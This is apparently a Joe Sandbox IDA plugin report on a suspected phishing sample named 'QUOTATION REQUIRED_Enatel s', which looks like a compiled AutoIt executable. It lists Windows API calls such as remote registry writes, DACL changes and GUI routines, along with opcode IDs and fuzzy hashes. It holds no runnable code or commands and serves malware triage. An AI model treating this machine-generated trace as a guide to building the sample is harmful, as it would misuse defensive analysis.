                                                                                                                      • Part of subcall function 00FA73E8: SetBkColor.GDI32(?,00000000), ref: 00FA748B
                                                                                                                      • Part of subcall function 00FA73E8: SelectObject.GDI32(?,?), ref: 00FA7498
                                                                                                                      • Part of subcall function 00FA73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00FA74B7
                                                                                                                      • Part of subcall function 00FA73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FA74CE
                                                                                                                      • Part of subcall function 00FA73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00FA74DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4124339563-0
                                                                                                                    • Opcode ID: 1c4bdff54a7ec421fa70a68a2af6131638cce444da7a7967bc4cf9b8e493e775
                                                                                                                    • Instruction ID: d04c71757c27198e8bae4d89cb1ec8c44354b5f3d08410e3822f7d8d4b2ea011
                                                                                                                    • Opcode Fuzzy Hash: 1c4bdff54a7ec421fa70a68a2af6131638cce444da7a7967bc4cf9b8e493e775
                                                                                                                    • Instruction Fuzzy Hash: EAA1B2B2508305AFDB00AF60DC48E6B7BE9FF4A320F140A19F962961E1D771E944EF91
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00F28E14
                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F66AC5
                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F66AFE
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F66F43
                                                                                                                      • Part of subcall function 00F28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F28BE8,?,00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F28FC5
                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00F66F7F
                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F66F96
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F66FAC
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F66FB7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                                    • Opcode ID: 8cadbf5f5379b2cb02763ceeeee922029308a9d93c76381e26a6537a2a1878b0
                                                                                                                    • Instruction ID: 71819e3400a04f9dd9f9a23e563ef4ab765d45c6c40bb3983cbb04a783feb7d1
                                                                                                                    • Opcode Fuzzy Hash: 8cadbf5f5379b2cb02763ceeeee922029308a9d93c76381e26a6537a2a1878b0
                                                                                                                    • Instruction Fuzzy Hash: 3512AC30A01655EFDB25CF14D884BAABBE5FB45320F184469F495CB262CB32AC52FB91
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00F9273E
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F9286A
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F928A9
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F928B9
                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F92900
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00F9290C
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F92955
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F92964
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F92974
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F92978
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F92988
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F92991
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00F9299A
                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F929C6
                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F929DD
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F92A1D
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F92A31
                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F92A42
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F92A77
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F92A82
                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F92A8D
                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F92A97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: 8856f8b1c694674b651e845a912d6b1cb2549ef994920e50b845b602df12be23
                                                                                                                    • Instruction ID: 821aa8072f3e24e3cd7da1aad279e681480942fd3f357d98cb91087263e74100
                                                                                                                    • Opcode Fuzzy Hash: 8856f8b1c694674b651e845a912d6b1cb2549ef994920e50b845b602df12be23
                                                                                                                    • Instruction Fuzzy Hash: ACB14BB1A00219AFEB14DFA9CC89FAE7BA9FB49710F004115F915EB290D774ED40DBA0
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F84AED
                                                                                                                    • GetDriveTypeW.KERNEL32(?,00FACB68,?,\\.\,00FACC08), ref: 00F84BCA
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00FACB68,?,\\.\,00FACC08), ref: 00F84D36
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    • Opcode ID: f6a13042484865ddfe7f19038c239a61008b03947770fac047b195350e3fd488
                                                                                                                    • Instruction ID: eb7b14fa1092df947b0eb08cf93c6d7ad20cbce641cda72bf6fe02146a7227d4
                                                                                                                    • Opcode Fuzzy Hash: f6a13042484865ddfe7f19038c239a61008b03947770fac047b195350e3fd488
                                                                                                                    • Instruction Fuzzy Hash: F96194317052079BCB04FF14CA81AE9B7B6AB46354B288416F806EB791DB75FD41FB82
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 00FA7421
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00FA7425
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA743B
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FA7446
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00FA744B
                                                                                                                    • GetSysColor.USER32(00000011), ref: 00FA7463
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FA7471
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00FA7482
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00FA748B
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00FA7498
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00FA74B7
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FA74CE
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FA74DB
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FA752A
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FA7554
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00FA7572
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00FA757D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 00FA758E
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00FA7596
                                                                                                                    • DrawTextW.USER32(?,00FA70F5,000000FF,?,00000000), ref: 00FA75A8
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00FA75BF
                                                                                                                    • DeleteObject.GDI32(?), ref: 00FA75CA
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00FA75D0
                                                                                                                    • DeleteObject.GDI32(?), ref: 00FA75D5
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00FA75DB
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00FA75E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: e01153b07c05bf7d059e4f8e0e1a4f63615f305519ae55e77abcaf9b74305584
                                                                                                                    • Instruction ID: ad1c4316043c7074d9f991e594f814ae4c952015e914f71667790acf4b402c58
                                                                                                                    • Opcode Fuzzy Hash: e01153b07c05bf7d059e4f8e0e1a4f63615f305519ae55e77abcaf9b74305584
                                                                                                                    • Instruction Fuzzy Hash: 3B6171B2D00218AFDF019FA4DC49EAE7FB9EF0A320F154125F915AB2A1D7749940EF90
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA1128
                                                                                                                    • GetDesktopWindow.USER32 ref: 00FA113D
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FA1144
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA1199
                                                                                                                    • DestroyWindow.USER32(?), ref: 00FA11B9
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FA11ED
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA120B
                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FA121D
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00FA1232
                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FA1245
                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00FA12A1
                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FA12BC
                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FA12D0
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA12E8
                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00FA130E
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00FA1328
                                                                                                                    • CopyRect.USER32(?,?), ref: 00FA133F
                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00FA13AA
                                                                                                                    Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 90e5e1787551b5f540acf3288884726b709634f63554d215b71eaadf750b6b68
• Instruction ID: 47faa9f0e2d8ef3fd6e95de5606e80df042d81665389117227de7549c4d63c71
• Opcode Fuzzy Hash: 90e5e1787551b5f540acf3288884726b709634f63554d215b71eaadf750b6b68
• Instruction Fuzzy Hash: F2B19DB1608341AFDB04DF64C884BABBBE5FF85350F00891CF9999B2A1D771E844EB91
APIs
• CharUpperBuffW.USER32(?,?), ref: 00FA02E5
• _wcslen.LIBCMT ref: 00FA031F
• _wcslen.LIBCMT ref: 00FA0389
• _wcslen.LIBCMT ref: 00FA03F1
• _wcslen.LIBCMT ref: 00FA0475
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FA04C5
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FA0504
  • Part of subcall function 00F2F9F2: _wcslen.LIBCMT ref: 00F2F9FD
  • Part of subcall function 00F7223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F72258
  • Part of subcall function 00F7223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F7228A
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: 4762c0995b61c35ebe1cb250fa9151a5b47ef27dca456a703e84dabb94ed99a0
• Instruction ID: bed29f78c917bc5c47989f17a4692dc5efb5ea8f0681c87cefd49e428609eb1f
• Opcode Fuzzy Hash: 4762c0995b61c35ebe1cb250fa9151a5b47ef27dca456a703e84dabb94ed99a0
• Instruction Fuzzy Hash: 89E1F3716183008FC714EF24D85092AB3E6FF89324F14496DF8969B3A2DB34ED45EB81
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F28968
• GetSystemMetrics.USER32(00000007), ref: 00F28970
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F2899B
• GetSystemMetrics.USER32(00000008), ref: 00F289A3
• GetSystemMetrics.USER32(00000004), ref: 00F289C8
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F289E5
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F289F5
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F28A28
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F28A3C
• GetClientRect.USER32(00000000,000000FF), ref: 00F28A5A
• GetStockObject.GDI32(00000011), ref: 00F28A76
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00F28A81
  • Part of subcall function 00F2912D: GetCursorPos.USER32(?), ref: 00F29141
  • Part of subcall function 00F2912D: ScreenToClient.USER32(00000000,?), ref: 00F2915E
  • Part of subcall function 00F2912D: GetAsyncKeyState.USER32(00000001), ref: 00F29183
  • Part of subcall function 00F2912D: GetAsyncKeyState.USER32(00000002), ref: 00F2919D
• SetTimer.USER32(00000000,00000000,00000028,00F290FC), ref: 00F28AA8
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 77cbedcd2e961c9fc011c7f2878d3262285acb962bf866a4b777c795ed5a22d7
• Instruction ID: da71aed544062d2bd71227c265b3a8d04031d9a694c513b600a8ccffe4372143
• Opcode Fuzzy Hash: 77cbedcd2e961c9fc011c7f2878d3262285acb962bf866a4b777c795ed5a22d7
• Instruction Fuzzy Hash: 85B19E71A002199FDB14DFA8DD85BAE3BB5FB48314F104229FA15EB290DB74E941EF90
APIs
  • Part of subcall function 00F710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71114
  • Part of subcall function 00F710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71120
  • Part of subcall function 00F710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F7112F
  • Part of subcall function 00F710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71136
  • Part of subcall function 00F710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F7114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F70DF5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F70E29
• GetLengthSid.ADVAPI32(?), ref: 00F70E40
• GetAce.ADVAPI32(?,00000000,?), ref: 00F70E7A
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F70E96
• GetLengthSid.ADVAPI32(?), ref: 00F70EAD
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F70EB5
• HeapAlloc.KERNEL32(00000000), ref: 00F70EBC
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F70EDD
• CopySid.ADVAPI32(00000000), ref: 00F70EE4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F70F13
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F70F35
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F70F47
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70F6E
• HeapFree.KERNEL32(00000000), ref: 00F70F75
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70F7E
• HeapFree.KERNEL32(00000000), ref: 00F70F85
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70F8E
• HeapFree.KERNEL32(00000000), ref: 00F70F95
• GetProcessHeap.KERNEL32(00000000,?), ref: 00F70FA1
• HeapFree.KERNEL32(00000000), ref: 00F70FA8
  • Part of subcall function 00F71193: GetProcessHeap.KERNEL32(00000008,00F70BB1,?,00000000,?,00F70BB1,?), ref: 00F711A1
  • Part of subcall function 00F71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F70BB1,?), ref: 00F711A8
  • Part of subcall function 00F71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F70BB1,?), ref: 00F711B7
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 847596b0736a66d964cf1034df7bb3bf1b12179f57182c64e48a8ca21b86f2c8
• Instruction ID: 15c2060cb5f2cd18fa69fe8676308541b070952ba5bae1cdc7ad886255c0bd1b
• Opcode Fuzzy Hash: 847596b0736a66d964cf1034df7bb3bf1b12179f57182c64e48a8ca21b86f2c8
• Instruction Fuzzy Hash: B9713CB290020AEBDB20DFA5DC45FEEBBB8FF05310F148116F919E6191DB719905DBA1
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C4BD
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00FACC08,00000000,?,00000000,?,?), ref: 00F9C544
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F9C5A4
• _wcslen.LIBCMT ref: 00F9C5F4
• _wcslen.LIBCMT ref: 00F9C66F
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F9C6B2
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F9C7C1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F9C84D
• RegCloseKey.ADVAPI32(?), ref: 00F9C881
• RegCloseKey.ADVAPI32(00000000), ref: 00F9C88E
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F9C960
Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                    • Opcode ID: 461084773588fc9137624488d94df968bc006babdfc96f55cf10b156c315b9dc
                                                                                                                    • Instruction ID: b730b06732a131571ec4d733dbd8d9f5d4e6720d3599fbfa7f76ad6dc2c625ae
                                                                                                                    • Opcode Fuzzy Hash: 461084773588fc9137624488d94df968bc006babdfc96f55cf10b156c315b9dc
                                                                                                                    • Instruction Fuzzy Hash: B3127A756043019FDB14EF14C891A6AB7E5EF88724F09885CF84A9B3A2DB35FC41EB81
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FA09C6
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0A01
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FA0A54
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0A8A
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0B06
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0B81
                                                                                                                      • Part of subcall function 00F2F9F2: _wcslen.LIBCMT ref: 00F2F9FD
                                                                                                                      • Part of subcall function 00F72BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F72BFA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
